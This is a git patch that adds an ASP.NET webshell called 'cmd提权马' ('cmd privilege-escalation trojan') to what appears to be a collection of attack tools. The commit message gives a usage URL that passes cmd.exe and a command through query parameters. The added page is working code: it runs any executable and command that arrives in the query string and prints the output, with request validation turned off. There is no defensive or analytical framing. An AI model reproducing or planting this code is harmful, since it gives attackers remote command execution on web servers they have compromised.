From aa27e0c4577dddf01b1bbb386461fd2804de56b6 Mon Sep 17 00:00:00 2001
From: tennc <tennc@users.noreply.github.com>
Date: Fri, 8 May 2015 09:46:11 +0800
Subject: [PATCH] =?UTF-8?q?Create=20cmd=E6=8F=90=E6=9D=83=E9=A9=AC.asp?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

用法：
http://192.168.1.108/moonshell.aspx?shell=C:\WINDOWS\system32\cmd.exe&sb=ipconfig
from： zone.wooyun.org
---
 asp/cmd提权马.asp | 68 +++++++++++++++++++++++++++++++++++++++++++++++
 1 file changed, 68 insertions(+)
 create mode 100644 asp/cmd提权马.asp

diff --git a/asp/cmd提权马.asp b/asp/cmd提权马.asp
new file mode 100644
index 0000000..809bf99
--- /dev/null
+++ b/asp/cmd提权马.asp
@@ -0,0 +1,68 @@
+<%@ Page Language="C#" Debug="true" trace="false" validateRequest="false" EnableViewStateMac="false" EnableViewState="true"%>
+<%@ import Namespace="System.IO"%>
+<%@ import Namespace="System.Diagnostics"%>
+<%@ import Namespace="System.Data"%>
+<%@ import Namespace="System.Management"%>
+<%@ import Namespace="System.Data.OleDb"%>
+<%@ import Namespace="Microsoft.Win32"%>
+<%@ import Namespace="System.Net.Sockets" %>
+<%@ import Namespace="System.Net" %>
+<%@ import Namespace="System.Web.UI"%>
+<%@ import Namespace="System.Runtime.InteropServices"%>
+<%@ import Namespace="System.DirectoryServices"%>
+<%@ import Namespace="System.ServiceProcess"%>
+<%@ import Namespace="System.Text.RegularExpressions"%>
+<%@ Import Namespace="System.Threading"%>
+<%@ Import Namespace="System.Data.SqlClient"%>
+<%@ import Namespace="Microsoft.VisualBasic"%>
+<%@ Assembly Name="System.DirectoryServices,Version=2.0.0.0,Culture=neutral,PublicKeyToken=B03F5F7F11D50A3A"%>
+<%@ Assembly Name="System.Management,Version=2.0.0.0,Culture=neutral,PublicKeyToken=B03F5F7F11D50A3A"%>
+<%@ Assembly Name="System.ServiceProcess,Version=2.0.0.0,Culture=neutral,PublicKeyToken=B03F5F7F11D50A3A"%>
+<%@ Assembly Name="Microsoft.VisualBasic,Version=7.0.3300.0,Culture=neutral,PublicKeyToken=b03f5f7f11d50a3a"%>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
+<script runat="server">
+protected void Page_load(object sender,EventArgs e)
+{
+  string ok = Request.QueryString["sb"];
+  string shell= Request.QueryString["shell"];
+  //www.moonsec.com moon
+  Response.Write(shell + ok );
+  Response.Write("<pre>");
+  Response.Write(GetCmd(ok,shell));
+  Response.Write("</pre>");
+}
+
+private string GetCmd(string cmd,string shell)
+{
+  string ok = string.Empty;
+   Process p = new Process();
+            p.StartInfo.FileName = shell;
+            p.StartInfo.UseShellExecute = false;
+            p.StartInfo.RedirectStandardInput = true;
+            p.StartInfo.RedirectStandardOutput = true;
+            p.StartInfo.RedirectStandardError = true;
+            p.StartInfo.CreateNoWindow = true;
+            string strOutput = null;
+            try
+            {
+                p.Start();
+                p.StandardInput.WriteLine(cmd);
+        Response.Write(cmd);
+                p.StandardInput.WriteLine("exit");
+                ok = p.StandardOutput.ReadToEnd();
+                p.WaitForExit();
+                p.Close();
+             }
+            catch (Exception ex)
+             {
+        Response.Write("<pre>");
+        Response.Write(ex);
+        Response.Write("/<pre>");
+                 }
+  return ok;
+}
+</script>
+</head>
+<body>
+</body>
+</html>